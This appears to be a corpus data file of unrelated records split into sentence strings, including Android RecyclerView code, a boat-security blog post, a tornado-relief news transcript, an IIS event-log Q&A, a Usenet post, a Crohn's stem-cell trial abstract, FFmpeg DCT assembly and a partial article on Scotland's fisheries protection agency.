getDecoratedRight(lastView);\n delta = Math.min(viewRight - getWidth(), dx);\n }\n }\n return delta;\n }\n\n private void measureChildWithDecorationsAndMargin(View child, int widthSpec, int heightSpec) {\n Rect decorRect = new Rect();\n calculateItemDecorationsForChild(child, decorRect);\n RecyclerView.", "LayoutParams lp = (RecyclerView.", "LayoutParams) child.getLayoutParams();\n widthSpec = updateSpecWithExtra(widthSpec, lp.leftMargin + decorRect.left,\n lp.rightMargin + decorRect.right);\n heightSpec = updateSpecWithExtra(heightSpec, lp.topMargin + decorRect.top,\n lp.bottomMargin + decorRect.bottom);\n child.measure(widthSpec, heightSpec);\n }\n\n private int updateSpecWithExtra(int spec, int startInset, int endInset) {\n if (startInset == 0 && endInset == 0) {\n return spec;\n }\n final int mode = View.", "MeasureSpec.getMode(spec);\n if (mode == View.", "MeasureSpec.", "AT_MOST || mode == View.", "MeasureSpec.", "EXACTLY) {\n return View.", "MeasureSpec.makeMeasureSpec(\n View.", "MeasureSpec.getSize(spec) - startInset - endInset, mode);\n }\n return spec;\n }\n\n\n private static class ViewAnimationInfo {\n int startTop;\n int startBottom;\n int finishTop;\n int finishBottom;\n View view;\n }\n}\n" ]
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[ "An article about GOST being used to successfully recover a vessel is posted on-line at SatNews publishers.", "\n\nFrom the article – ‘The Yellowfin, which is used for offshore fishing, was stolen from Marsh Harbor in the early hours of the morning after the vessel had arrived from the United States the day before. ", "Luckily, it was fitted with a GOST NT- Evolution security system, which enabled it to be located. ", "The yacht was found drifting with no one on board and was successfully recovered.’", "\n\nCategories: Posts|Comments Off on Good news for GOST Security System user\n\nFrom Noonsite– news of a burglary in Upper Phang Nga Bay, Krabi, Thailand and an Armed Boarding in Paluan Bay, Mindoro, Philippines.", "\n\nExcerpt – ‘This is our 2nd visit to the Philippines and we must emphasise that we have had some wonderful and humbling experiences cruising many islands and visiting local villages across all regions. ", "The local people have always been welcoming, friendly and helpful. ", "Until that night we have never felt unsafe here. ", "We think this was a group of uneducated opportunists and we were just in the wrong place at the wrong time.", "\n\nIn reporting this incident we hope not to scare people, or put them off coming here just be wary of people around your boat at night and stay out of that bay.’", "\n\nCommon to both events was the attitude of ‘it is so nice here, nothing bad can happen’ – same with our daily commutes on land. ", "Be aware of your surroundings, be alert to signs that may be present to up your awareness if need be. ", "There is no 100% magic cure – and it is up to you the cruiser/captain to provide your own security measures – someone else will not come to your aid until after the incident has happened.", "\n\nOn a similar note, the SE Asia Cruisers Radio Net – a local radio net is a great source for local news and information – has closed due to lack of demand and poor propagation. ", "I hope someone in the region is taking note and can provide the service.", "\n\nAccording to the article, the owners did the recommended actions to prevent the theft (raising the dinghy, securing the obm with a cable, etc).", "\n\nOne paragraph – ‘Once more, be vigilant. ", "Use extra precaution in stowing the dink. ", "Stowe it as high as you can. ", "A bar-lock system is most efficient. ", "Also, consider a cable-alarm system: no lock, the cable must be cut, which triggers a 120 db. ", "alarm. ", "Having a dog on board is a pretty good alarm system, as well as motion-triggered lights.’", "\n\nI have a link on the site to Tampa Bay Alarm Locks, which offers a security cable with an audible alarm. ", "Stop by, see if it will suit your needs.", "\n\nSituational Awareness is an attribute we stress very much – from a self defense perspective, it keeps us from having to use the physical skills we usually associate with martial arts (and the damage tha can come from it on multiple levels).", "\n\nITS Tactical recently posted a link on the subject; and the folks over at Stickgrappler\n\nhave posted a great article, which ties in to the use of a color system (outlined below).", "\n\nTHE PROTECTION LADDER AND LEVELS OF AWARENESS\n\nCONDITION RED\n\nFIGHT OR FLIGHT\nTHE PRE-EMPTIVE STRIKE\n\nCONDITION ORANGE\n\nRESPONSE TO THREAT\nMAKING A DECISION\n\nCONDITION YELLOW\n\nBASIS FOR PERSONAL SECURITY\nAWARENESS – EVALUATION – AVOIDANCE\n\nCONDITION WHITE\n\nLACK OF AWARENESS\n\nTHE VICTIM SYNDROME\n\nTake the time to read the insightful articles. ", "Let me know what you think." ]
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[ "oklahoma, a different kind of rescue team deployed, trained in disaster relief, and faith. ", "Faith-based. ", "Offering food, water, blankets and prayer. ", "As one person said, it's god's love with work gloves. ", "Abc's byron pitts is on the ground with the oklahoma relief baptist team. ", "Reporter: This is ground zero for the american red oss. ", "Inside those folks who have not yet been notified about their children, whether they survived or passed away. ", "There are chaplains inside with those families. ", "Some families have been reunited with their children. ", "Others received word their children died. ", "There are a handful of families inside now waiting for word. ", "These good folks in the yellow shirts behind me are all volunteers. ", "All members of the southern baptist convention who are providing the meals. ", "So far they've served about 1,400 meals to the survivors. ", "Sam is with them. ", "Sam, you guys have real experience in this. ", "You were in new york after 9/11, after sandy hook. ", "What's your mission here? ", "Our mission here is to help give provision for the victims, the survivors, and also the volunteers that are helping with them. ", "We'll feed meals and clean debris from their homes, hundreds of volunteers. ", "All right, thank you so much. ", "Reporter: They're prepared to serve 30,000 meals tomorrow, starting with breakfast sometime tomorrow and serve meals throughout the day. ", "Still gearing up at this point. ", "They are living their faith, the old african proverb, when you pray, move your feet. ", "These good folks are moving in action to help their neighbors.", "\n\nThis transcript has been automatically generated and may not be 100% accurate.", "\n\nNow Playing: Man Arrested for Manslaughter in Slaying of Ex-NFL Player\n\nNow Playing: {{itm.title}}\n\n{\"id\":19229262,\"title\":\"Community Groups Help Oklahoma Tornado Victims\",\"duration\":\"1:39\",\"description\":\"Church members are ready to provide food for those in need.", "\",\"url\":\"/WNT/video/community-groups-oklahoma-tornado-victims-19229262\",\"section\":\"WNT\",\"mediaType\":\"default\"}" ]
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[ "Q:\n\nHow to Find App Pool Recycles in Event Log\n\nI have configured an app pool in IIS 7.5 to recycle when the memory usage goes above a certain level. ", "I have also configured it to log this information.", "\nWhere in the event log should I look for this?", "\nI have tried filtering based on the source being all the IIS items, e.g. 'IIS-W3SVC-WP', 'IIS-IISManager', and all the rest, but nothing.", "\nI can see that it is adding in the items from the 'IIS-Configuration' log too which I enabled. ", "But still nothing.", "\n\nA:\n\nIt seemed quite hard to find this information, but eventually, I came across this question \nYou have to look at the 'System' event log, and filter by the WAS source. ", "\nHere is more info about the WAS\n\nA:\n\nAs it seems impossible to filter the XPath message data (it isn't in the XML to filter), you can also use powershell to search:\nGet-WinEvent -LogName System | Where-Object {$_.Message -like \"*recycle*\"}\n\nFrom this, I can see that the event Id for recycling seems to be 5074, so you can filter on this as well. ", "I hope this helps someone as this information seemed to take a lot longer than expected to work out.", "\nThis along with @BlackHawkDesign comment should help you find what you need.", "\n\nI had the same issue. ", "Maybe interesting to mention is that you have to\n configure in which cases the app pool recycle event is logged. ", "By\n default it's in a couple of cases, not all of them. ", "You can do that in\n IIS > app pools > select the app pool > advanced settings > expand\n generate recycle event log entry – BlackHawkDesign Jan 14 '15 at 10:00\n\nA:\n\nAs link-only answers are not preferred, I will just copy and paste the content of the link of the accepted answer\n\nIt is definitely System Log. ", "\nWhich Log file? ", "Well -- you can check the physical path by right-clicking on the System Log (e.g. Server Manager | Diagnostics | Event Viewer | Windows Logs). ", "The default physical path is %SystemRoot%\\System32\\Winevt\\Logs\\System.evtx.", "\nYou can create a Custom Filter and filter by \"Source: WAS\" to quickly see only entries generated by IIS.", "\nYou may need first to enable logging of such even for a specific App Pool -- by default App Pool has only 3 recycle events out of 8 enabled. ", "To change it using GUI: II S Manager | Application Pools | Select App Pool -> Advanced Settings | Generate Recycle Event Log Entry.", "\n\n" ]
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[ "Newsgroups: rec.motorcycles\nPath: cantaloupe.srv.cs.cmu.edu!crabapple.srv.cs.cmu.edu!fs7.ece.cmu.edu!europa.eng.gtefsd.com!darwin.sura.net!uvaarpa!maxwell!cds7k\nFrom: cds7k@Virginia.", "EDU (Christopher Douglas Saady)\nSubject: Re: Looking for MOVIES w/ BIKES\nMessage-ID: <1993Apr21.115453.17928@Virginia.", "EDU>\nOrganization: University of Virginia\nReferences: <speedy.162@engr.latech.edu>\nDate: Wed, 21 Apr 1993 11:54:53 GMT\nLines: 4\n\nThere's also Billy Jack, The Wild One, Smokey and the Bandit\n(Where Jerry Reed runs his truck over Motorcycle Gangs Bikes),\nand a video tape documentary on the Hell's Angels I\nfound in a rental store once\n" ]
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[ "Stem cells as treatment in inflammatory bowel disease.", "\nThe Autologous Stem Cell Transplantation International Crohn's Disease (ASTIC) trial is a randomised controlled evaluation of the proposition that immunoablation and haemopoietic stem cell transplantation improves the course of Crohn's disease. ", "Recruitment of all 48 patients in the trial will be completed in early 2012 and the results to date are descriptively presented here. ", "Patients with an impaired quality of life due to active Crohn's disease, despite the administration of at least 3 immunosuppressive agents, all received mobilisation treatment (cyclophosphamide 4 g/m(2) over 2 days followed by recombinant human granulocyte colony stimulating factor (filgrastim) 10 µg/kg daily before randomisation to immediate (after 1 month) or delayed (after 1 year) immunoablation and stem cell transplantation. ", "The conditioning regime was cyclophosphamide 50 mg/kg/day for 4 days, anti-thymocyte globulin 2.5 mg/kg/day and methylprednisolone 1 mg/kg on days 3-5. ", "The bone marrow was reconstituted by the infusion of an unselected graft of 3-8 × 10(6)/kg CD34-positive stem cells. ", "Results were compared 1 year after mobilisation alone or after transplantation. ", "Twelve months after stem cell transplantation (early or delayed) the Crohn's Disease Activity Index (CDAI) fell from 324 (median, interquartile range 229-411) to 161 (85-257, n = 17) compared to 351 (287-443) to 272 (214-331) following mobilisation alone (n = 11). ", "Six patients had a normal CDAI after transplantation versus 1 after mobilisation. ", "C-reactive protein fell from 16.6 (6.7-32.0) to 6.5 (3.5-12.5) mg/l versus 14 (8.0-27.0) to 9.0 (2.0-23.4) mg/l following mobilisation alone. ", "The Crohn's Disease Endoscopic Index of Severity (CDEIS) (aggregate for upper and lower endoscopy) fell from 18 (10-25) to 5 (1-11) following transplantation versus 14 (12-16) to 9 (4-22) following mobilisation. ", "Three patients achieved the goal of a normal CDAI, no drug therapy and normal upper and lower endoscopy 1 year after transplantation, but so did 1 patient following mobilisation alone. ", "Serious adverse events were common (n = 100 to date) with 42 infective episodes requiring or prolonging hospitalisation, following both mobilisation and conditioning and transplantation. ", "There were 7 episodes of viral (re)activation. ", "Temporary flare of Crohn's disease activity or a need for surgery occurred in 8 patients. ", "Immunoablation and haemopoietic stem cell transplantation appear to be an effective treatment for some patients with Crohn's disease, although full results will be required for a firm conclusion. ", "The risks are significant, making it potentially suitable for only a limited number of patients. ", "Data from the whole trial will be needed to judge whether mobilisation alone has any benefits." ]
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[ ";******************************************************************************\n;* 32 point SSE-optimized DCT transform\n;* Copyright (c) 2010 Vitor Sessak\n;*\n;* This file is part of FFmpeg.", "\n;*\n;* FFmpeg is free software; you can redistribute it and/or\n;* modify it under the terms of the GNU Lesser General Public\n;* License as published by the Free Software Foundation; either\n;* version 2.1 of the License, or (at your option) any later version.", "\n;*\n;* FFmpeg is distributed in the hope that it will be useful,\n;* but WITHOUT ANY WARRANTY; without even the implied warranty of\n;* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. ", " See the GNU\n;* Lesser General Public License for more details.", "\n;*\n;* You should have received a copy of the GNU Lesser General Public\n;* License along with FFmpeg; if not, write to the Free Software\n;* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA\n;******************************************************************************\n\n%include \"libavutil/x86/x86util.asm\"\n\nSECTION_RODATA 32\n\nalign 32\nps_cos_vec: dd 0.500603, 0.505471, 0.515447, 0.531043\n dd 0.553104, 0.582935, 0.622504, 0.674808\n dd -10.190008, -3.407609, -2.057781, -1.484165\n dd -1.169440, -0.972568, -0.839350, -0.744536\n dd 0.502419, 0.522499, 0.566944, 0.646822\n dd 0.788155, 1.060678, 1.722447, 5.101149\n dd 0.509796, 0.601345, 0.899976, 2.562916\n dd 0.509796, 0.601345, 0.899976, 2.562916\n dd 1.000000, 1.000000, 1.306563, 0.541196\n dd 1.000000, 1.000000, 1.306563, 0.541196\n dd 1.000000, 0.707107, 1.000000, -0.707107\n dd 1.000000, 0.707107, 1.000000, -0.707107\n dd 0.707107, 0.707107, 0.707107, 0.707107\n\nalign 32\nps_p1p1m1m1: dd 0, 0, 0x80000000, 0x80000000, 0, 0, 0x80000000, 0x80000000\n\n%macro BUTTERFLY 4\n subps %4, %1, %2\n addps %2, %2, %1\n mulps %1, %4, %3\n%endmacro\n\n%macro BUTTERFLY0 5\n%if cpuflag(sse2) && notcpuflag(avx)\n pshufd %4, %1, %5\n xorps %1, %2\n addps %1, %4\n mulps %1, %3\n%else\n shufps %4, %1, %1, %5\n xorps %1, %1, %2\n addps %4, %4, %1\n mulps %1, %4, %3\n%endif\n%endmacro\n\n%macro BUTTERFLY2 4\n BUTTERFLY0 %1, %2, %3, %4, 0x1b\n%endmacro\n\n%macro BUTTERFLY3 4\n BUTTERFLY0 %1, %2, %3, %4, 0xb1\n%endmacro\n\n%macro BUTTERFLY3V 5\n movaps m%5, m%1\n addps m%1, m%2\n subps m%5, m%2\n SWAP %2, %5\n mulps m%2, [ps_cos_vec+192]\n movaps m%5, m%3\n addps m%3, m%4\n subps m%4, m%5\n mulps m%4, [ps_cos_vec+192]\n%endmacro\n\n%macro PASS6_AND_PERMUTE 0\n mov tmpd, [outq+4]\n movss m7, [outq+72]\n addss m7, [outq+76]\n movss m3, [outq+56]\n addss m3, [outq+60]\n addss m4, m3\n movss m2, [outq+52]\n addss m2, m3\n movss m3, [outq+104]\n addss m3, [outq+108]\n addss m1, m3\n addss m5, m4\n movss [outq+ 16], m1\n movss m1, [outq+100]\n addss m1, m3\n movss m3, [outq+40]\n movss [outq+ 48], m1\n addss m3, [outq+44]\n movss m1, [outq+100]\n addss m4, m3\n addss m3, m2\n addss m1, [outq+108]\n movss [outq+ 40], m3\n addss m2, [outq+36]\n movss m3, [outq+8]\n movss [outq+ 56], m2\n addss m3, [outq+12]\n movss [outq+ 32], m3\n movss m3, [outq+80]\n movss [outq+ 8], m5\n movss [outq+ 80], m1\n movss m2, [outq+52]\n movss m5, [outq+120]\n addss m5, [outq+124]\n movss m1, [outq+64]\n addss m2, [outq+60]\n addss m0, m5\n addss m5, [outq+116]\n mov [outq+64], tmpd\n addss m6, m0\n addss m1, m6\n mov tmpd, [outq+12]\n mov [outq+ 96], tmpd\n movss [outq+ 4], m1\n movss m1, [outq+24]\n movss [outq+ 24], m4\n movss m4, [outq+88]\n addss m4, [outq+92]\n addss m3, m4\n addss m4, [outq+84]\n mov tmpd, [outq+108]\n addss m1, [outq+28]\n addss m0, m1\n addss m1, m5\n addss m6, m3\n addss m3, m0\n addss m0, m7\n addss m5, [outq+20]\n addss m7, m1\n movss [outq+ 12], m6\n mov [outq+112], tmpd\n movss m6, [outq+28]\n movss [outq+ 28], m0\n movss m0, [outq+36]\n movss [outq+ 36], m7\n addss m1, m4\n movss m7, [outq+116]\n addss m0, m2\n addss m7, [outq+124]\n movss [outq+ 72], m0\n movss m0, [outq+44]\n addss m2, m0\n movss [outq+ 44], m1\n movss [outq+ 88], m2\n addss m0, [outq+60]\n mov tmpd, [outq+60]\n mov [outq+120], tmpd\n movss [outq+104], m0\n addss m4, m5\n addss m5, [outq+68]\n movss [outq+52], m4\n movss [outq+60], m5\n movss m4, [outq+68]\n movss m5, [outq+20]\n movss [outq+ 20], m3\n addss m5, m7\n addss m7, m6\n addss m4, m5\n movss m2, [outq+84]\n addss m2, [outq+92]\n addss m5, m2\n movss [outq+ 68], m4\n addss m2, m7\n movss m4, [outq+76]\n movss [outq+ 84], m2\n movss [outq+ 76], m5\n addss m7, m4\n addss m6, [outq+124]\n addss m4, m6\n addss m6, [outq+92]\n movss [outq+100], m4\n movss [outq+108], m6\n movss m6, [outq+92]\n movss [outq+92], m7\n addss m6, [outq+124]\n movss [outq+116], m6\n%endmacro\n\nINIT_YMM avx\nSECTION_TEXT\n%if HAVE_AVX_EXTERNAL\n; void ff_dct32_float_avx(FFTSample *out, const FFTSample *in)\ncglobal dct32_float, 2,3,8, out, in, tmp\n ; pass 1\n vmovaps m4, [inq+0]\n vinsertf128 m5, m5, [inq+96], 1\n vinsertf128 m5, m5, [inq+112], 0\n vshufps m5, m5, m5, 0x1b\n BUTTERFLY m4, m5, [ps_cos_vec], m6\n\n vmovaps m2, [inq+64]\n vinsertf128 m6, m6, [inq+32], 1\n vinsertf128 m6, m6, [inq+48], 0\n vshufps m6, m6, m6, 0x1b\n BUTTERFLY m2, m6, [ps_cos_vec+32], m0\n\n ; pass 2\n\n BUTTERFLY m5, m6, [ps_cos_vec+64], m0\n BUTTERFLY m4, m2, [ps_cos_vec+64], m7\n\n\n ; pass 3\n vperm2f128 m3, m6, m4, 0x31\n vperm2f128 m1, m6, m4, 0x20\n vshufps m3, m3, m3, 0x1b\n\n BUTTERFLY m1, m3, [ps_cos_vec+96], m6\n\n\n vperm2f128 m4, m5, m2, 0x20\n vperm2f128 m5, m5, m2, 0x31\n vshufps m5, m5, m5, 0x1b\n\n BUTTERFLY m4, m5, [ps_cos_vec+96], m6\n\n ; pass 4\n vmovaps m6, [ps_p1p1m1m1+0]\n vmovaps m2, [ps_cos_vec+128]\n\n BUTTERFLY2 m5, m6, m2, m7\n BUTTERFLY2 m4, m6, m2, m7\n BUTTERFLY2 m1, m6, m2, m7\n BUTTERFLY2 m3, m6, m2, m7\n\n\n ; pass 5\n vshufps m6, m6, m6, 0xcc\n vmovaps m2, [ps_cos_vec+160]\n\n BUTTERFLY3 m5, m6, m2, m7\n BUTTERFLY3 m4, m6, m2, m7\n BUTTERFLY3 m1, m6, m2, m7\n BUTTERFLY3 m3, m6, m2, m7\n\n vperm2f128 m6, m3, m3, 0x31\n vmovaps [outq], m3\n\n vextractf128 [outq+64], m5, 1\n vextractf128 [outq+32], m5, 0\n\n vextractf128 [outq+80], m4, 1\n vextractf128 [outq+48], m4, 0\n\n vperm2f128 m0, m1, m1, 0x31\n vmovaps [outq+96], m1\n\n vzeroupper\n\n ; pass 6, no SIMD...\nINIT_XMM\n PASS6_AND_PERMUTE\n RET\n%endif\n\n%if ARCH_X86_64\n%define SPILL SWAP\n%define UNSPILL SWAP\n\n%macro PASS5 0\n nop ; FIXME code alignment\n SWAP 5, 8\n SWAP 4, 12\n SWAP 6, 14\n SWAP 7, 13\n SWAP 0, 15\n PERMUTE 9,10, 10,12, 11,14, 12,9, 13,11, 14,13\n TRANSPOSE4x4PS 8, 9, 10, 11, 0\n BUTTERFLY3V 8, 9, 10, 11, 0\n addps m10, m11\n TRANSPOSE4x4PS 12, 13, 14, 15, 0\n BUTTERFLY3V 12, 13, 14, 15, 0\n addps m14, m15\n addps m12, m14\n addps m14, m13\n addps m13, m15\n%endmacro\n\n%macro PASS6 0\n SWAP 9, 12\n SWAP 11, 14\n movss [outq+0x00], m8\n pshuflw m0, m8, 0xe\n movss [outq+0x10], m9\n pshuflw m1, m9, 0xe\n movss [outq+0x20], m10\n pshuflw m2, m10, 0xe\n movss [outq+0x30], m11\n pshuflw m3, m11, 0xe\n movss [outq+0x40], m12\n pshuflw m4, m12, 0xe\n movss [outq+0x50], m13\n pshuflw m5, m13, 0xe\n movss [outq+0x60], m14\n pshuflw m6, m14, 0xe\n movaps [outq+0x70], m15\n pshuflw m7, m15, 0xe\n addss m0, m1\n addss m1, m2\n movss [outq+0x08], m0\n addss m2, m3\n movss [outq+0x18], m1\n addss m3, m4\n movss [outq+0x28], m2\n addss m4, m5\n movss [outq+0x38], m3\n addss m5, m6\n movss [outq+0x48], m4\n addss m6, m7\n movss [outq+0x58], m5\n movss [outq+0x68], m6\n movss [outq+0x78], m7\n\n PERMUTE 1,8, 3,9, 5,10, 7,11, 9,12, 11,13, 13,14, 8,1, 10,3, 12,5, 14,7\n movhlps m0, m1\n pshufd m1, m1, 3\n SWAP 0, 2, 4, 6, 8, 10, 12, 14\n SWAP 1, 3, 5, 7, 9, 11, 13, 15\n%rep 7\n movhlps m0, m1\n pshufd m1, m1, 3\n addss m15, m1\n SWAP 0, 2, 4, 6, 8, 10, 12, 14\n SWAP 1, 3, 5, 7, 9, 11, 13, 15\n%endrep\n%assign i 4\n%rep 15\n addss m0, m1\n movss [outq+i], m0\n SWAP 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15\n %assign i i+8\n%endrep\n%endmacro\n\n%else ; ARCH_X86_32\n%macro SPILL 2 ; xmm#, mempos\n movaps [outq+(%2-8)*16], m%1\n%endmacro\n%macro UNSPILL 2\n movaps m%1, [outq+(%2-8)*16]\n%endmacro\n\n%define PASS6 PASS6_AND_PERMUTE\n%macro PASS5 0\n movaps m2, [ps_cos_vec+160]\n shufps m3, m3, 0xcc\n\n BUTTERFLY3 m5, m3, m2, m1\n SPILL 5, 8\n\n UNSPILL 1, 9\n BUTTERFLY3 m1, m3, m2, m5\n SPILL 1, 14\n\n BUTTERFLY3 m4, m3, m2, m5\n SPILL 4, 12\n\n BUTTERFLY3 m7, m3, m2, m5\n SPILL 7, 13\n\n UNSPILL 5, 10\n BUTTERFLY3 m5, m3, m2, m7\n SPILL 5, 10\n\n UNSPILL 4, 11\n BUTTERFLY3 m4, m3, m2, m7\n SPILL 4, 11\n\n BUTTERFLY3 m6, m3, m2, m7\n SPILL 6, 9\n\n BUTTERFLY3 m0, m3, m2, m7\n SPILL 0, 15\n%endmacro\n%endif\n\n\n; void ff_dct32_float_sse(FFTSample *out, const FFTSample *in)\n%macro DCT32_FUNC 0\ncglobal dct32_float, 2, 3, 16, out, in, tmp\n ; pass 1\n\n movaps m0, [inq+0]\n LOAD_INV m1, [inq+112]\n BUTTERFLY m0, m1, [ps_cos_vec], m3\n\n movaps m7, [inq+64]\n LOAD_INV m4, [inq+48]\n BUTTERFLY m7, m4, [ps_cos_vec+32], m3\n\n ; pass 2\n movaps m2, [ps_cos_vec+64]\n BUTTERFLY m1, m4, m2, m3\n SPILL 1, 11\n SPILL 4, 8\n\n ; pass 1\n movaps m1, [inq+16]\n LOAD_INV m6, [inq+96]\n BUTTERFLY m1, m6, [ps_cos_vec+16], m3\n\n movaps m4, [inq+80]\n LOAD_INV m5, [inq+32]\n BUTTERFLY m4, m5, [ps_cos_vec+48], m3\n\n ; pass 2\n BUTTERFLY m0, m7, m2, m3\n\n movaps m2, [ps_cos_vec+80]\n BUTTERFLY m6, m5, m2, m3\n\n BUTTERFLY m1, m4, m2, m3\n\n ; pass 3\n movaps m2, [ps_cos_vec+96]\n shufps m1, m1, 0x1b\n BUTTERFLY m0, m1, m2, m3\n SPILL 0, 15\n SPILL 1, 14\n\n UNSPILL 0, 8\n shufps m5, m5, 0x1b\n BUTTERFLY m0, m5, m2, m3\n\n UNSPILL 1, 11\n shufps m6, m6, 0x1b\n BUTTERFLY m1, m6, m2, m3\n SPILL 1, 11\n\n shufps m4, m4, 0x1b\n BUTTERFLY m7, m4, m2, m3\n\n ; pass 4\n movaps m3, [ps_p1p1m1m1+0]\n movaps m2, [ps_cos_vec+128]\n\n BUTTERFLY2 m5, m3, m2, m1\n\n BUTTERFLY2 m0, m3, m2, m1\n SPILL 0, 9\n\n BUTTERFLY2 m6, m3, m2, m1\n SPILL 6, 10\n\n UNSPILL 0, 11\n BUTTERFLY2 m0, m3, m2, m1\n SPILL 0, 11\n\n BUTTERFLY2 m4, m3, m2, m1\n\n BUTTERFLY2 m7, m3, m2, m1\n\n UNSPILL 6, 14\n BUTTERFLY2 m6, m3, m2, m1\n\n UNSPILL 0, 15\n BUTTERFLY2 m0, m3, m2, m1\n\n PASS5\n PASS6\n RET\n%endmacro\n\n%macro LOAD_INV 2\n%if cpuflag(sse2)\n pshufd %1, %2, 0x1b\n%elif cpuflag(sse)\n movaps %1, %2\n shufps %1, %1, 0x1b\n%endif\n%endmacro\n\n%if ARCH_X86_32\nINIT_XMM sse\nDCT32_FUNC\n%endif\nINIT_XMM sse2\nDCT32_FUNC\n" ]
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[ "Scottish Fisheries Protection Agency\n\nThe Scottish Fisheries Protection Agency (SFPA) was an Executive Agency of the Scottish Government. ", "On 1 April 2009, the Scottish Fisheries Protection Agency and Fisheries Research Services were merged with the Scottish Government Marine Directorate to form Marine Scotland, part of the core Scottish Government.", "\n\nThe SFPA was responsible for both deterring illegal fishing in Scottish waters, as well as monitoring the compliance of the fisheries industry in Scotland with the relevant Scottish and European Union laws on fisheries. ", "The Agency had 18 Fishery Offices, a fleet of 3 Fishery Protection Vessels, and 2 aircraft for the purposes of monitoring and enforcement in the waters around Scotland. ", "The letters \"SF\" that appeared in the Agency's ensign relate to the words \"Sea Fisheries\" as the agency was part of the UK Sea Fisheries Inspectorate (SFI).", "\n\nHistory\nThe UK Parliament has legislated for the protection and control of fisheries in the waters around the United Kingdom since the early 19th century. ", "In the early 19th century the Commissioners of the British White Herring Fishery were appointed, who had the power to detail naval vessels to superintend the herring fisheries; officers of the fishery were appointed with particular emphasis on the certification of cured herring for export and for making the necessary brand on the barrel. ", "Experience as a cooper – a maker of barrels – remained a qualification for Fishery Officers until as recently as 1939.", "\n\nIn 1882, the Fishery Board for Scotland was established for the purposes of protecting sea fisheries in the waters around Scotland and land-based inspection of landed catches. ", "By 1909, the Board's fleet included 5 steam vessels; at the outbreak of World War II, the fleet had been increased to 8 vessels which included 2 small motor boats. ", "The Board's responsibilities were transferred to the Secretary of State for Scotland in 1939.", "\n\nIn April 1991 the Secretary of State for Scotland established the fisheries protection and enforcement services as an executive agency as part of the Government's Next Steps Initiative, which sought to devolve specific activities from central Government to free-standing organisations, headed by Chief Executives accountable to Ministers. ", "Hence, the Scottish Fisheries Protection Agency was established as an executive agency of the Scottish Office with the resources of 230 staff, 20 coastal offices, 6 protection vessels and 2 surveillance aircraft. ", "Following devolution in Scotland, the agency transferred to the control of the Scottish Executive Environment and Rural Affairs Department (SEERAD).", "\n\nIn 2007, the Scottish National Party (SNP) changed the structure of the Scottish Executive (now known as the Scottish Government), and the SFPA became associated with the Director-General of the Environment.", "\n\nResponsibilities\nThe SFPA was responsible for monitoring compliance and taking enforcement action, where necessary, to deter and detect illegitimate activities in the marine environment.", "\n\nResources\n\nSFPA Headquarters\n\nThe Headquarters of the SFPA was located in Pentland House, Edinburgh. ", "It housed the supporting arms of the Agency including Finance, Corporate Affairs, Human Resources, Training, Pay, Procurement and Health & Safety as well as the Prosecution & Enforcement Policy branch and the Marine Monitoring Centre (previously known as the HQ Operations).", "\n\nMarine Monitoring Centre and UKFCC\n\nThe Marine Monitoring Centre was responsible for tasking SFPA assets, primarily FPVs and surveillance aircraft, to address the key priorities, which were determined using risk-based analysis. ", "The Marine Monitoring Centre also acted as part of the UK Fisheries Monitoring Centre, maintaining and monitoring the VMS satellite tracking system of all fishing vessels in Scottish waters and Scottish fishing vessels globally. ", "The MMC was manned between 0700–2200 Monday to Friday and 0800-1100 on weekends.", "\n\nFrom 1 June 2005, the UK Fisheries Call Centre (UKFCC), based within the MMC, has been the single point of contact for all notification or reporting requirements from fishing vessels in UK waters, working of behalf of Marine Scotland Compliance, the Marine Fisheries Agency of England and Wales (MFA), and the Department of Agriculture and Rural Development of Northern Ireland (DARNDI).", "\n\nThe MMC & UKFCC had approximately 13 staff.", "\n\nStaff\nThe SFPA employed 285 staff, in the following areas:\n\nMarine Surveillance – 134\nCoastal Inspection – 124\nHeadquarters – 27\n\nAlthough the SFPA owned two surveillance aircraft, the air crews were provided by a private Company on a contract basis.", "\n\nAll staff employed directly by the SFPA were Civil Servants and subject to Civil Service terms and conditions of employment.", "\n\nCoastal Inspection\n\nThe Marine staff were responsible for crewing the three Marine Protection Vessels, with each Vessel having two crews who operated on the basis of 3 weeks on duty followed by 3 weeks off duty. ", "Further details of the Vessels and their crewing arrangements can be found in the 'Ships' page of this section of the website.", "\n\nCoastal Inspection\n\nThe Coastal Inspection staff, who made up the Sea Fisheries Inspectorate, were split into two Areas – North / East and South / West – the split of Fishery Offices in each area is provided below:\n\nThe main tasks for the Coastal SFI was to ensure the integrity of the Quota Management System and the enforcement of regulations on effort limitation, stock recovery programmes, VMS and the Registration of Buyers and Sellers act. ", "This was accomplished by:\n Inspections of catches in ports on board vessels, in fish markets and on landing for direct sale.", "\n Weighing of whitefish catches as required by EU legislation, with catches sample weighed at the point of landing, on fish markets and at merchants’ premises.", "\n Enforcing the timeous submission of logsheets and landing declarations in compliance with the EU and UK legislation and in the submission of salesnotes and buyers notes, in compliance with the legislation on the registration of sellers and buyers of sea fish.", "\n Ensuring catches are accurately recorded against quota and that buyers and sellers are complying with the regulations.", "\n Carrying out post landing investigations in cases where there is reason to suspect that catches were not accurately declared at the time of landing and sale.", "\n Carrying out audit checks on registered buyers under protocols with the Marine Directorate.", "\n Enforcing pelagic fisheries regulations by means of tank-dipping prior to landing, or verifying the weights of catches as they are landed through the approved and certified weighing systems.", "\n\nMarine SFI\nThe Marine Sea Fisheries Inspectorate (SFI) consisted of a fleet of 4 Fishery Protection Vessels (FPVs) in service as of 2009. ", " A fleet renewal programme to replace the ageing Sulisker type began in 2003 with the delivery of the first Minna type, followed by the Jura type in 2005. ", "It was originally intended to upgrade the fleet to 3 Jura type vessels and 2 Minna type vessels, however the renewal programme was under review by the Scottish Government.", "\n\nScottish FPVs are not military ships and are not armed. ", "They used the prefix FPV, and fly the SFPA's ensign. ", " Scottish FPVs were responsible for the inspection of fishing vessels at sea in Scottish waters and Scottish vessels in the waters of other member states. ", "The high profile of the fleet at sea acted as a deterrent against illegal fishing and is pivotal to the information informing the Real Time Closure (RTC) scheme. ", "FPVs also contribute towards the UK's commitment to NEAFC, with annual patrols in the NEAFC area west of Rockall.", "\n\nHistorically, additional Fishery Protection Vessels were provided by the Fishery Protection Squadron of the Royal Navy which was previously based at Rosyth. ", " In 1994, the Agency determined that this assistance was no longer required and the Fishery Protection Squadron was moved to Portsmouth as part of the Strategic Defence Review (SDR). ", "From that time, all Fishery Protection operations in Scottish waters (with the exception of joint exercises) were been conducted by SFPA vessels.", "\n\nThe Marine SFI had approximately 133 staff and had projected running costs of 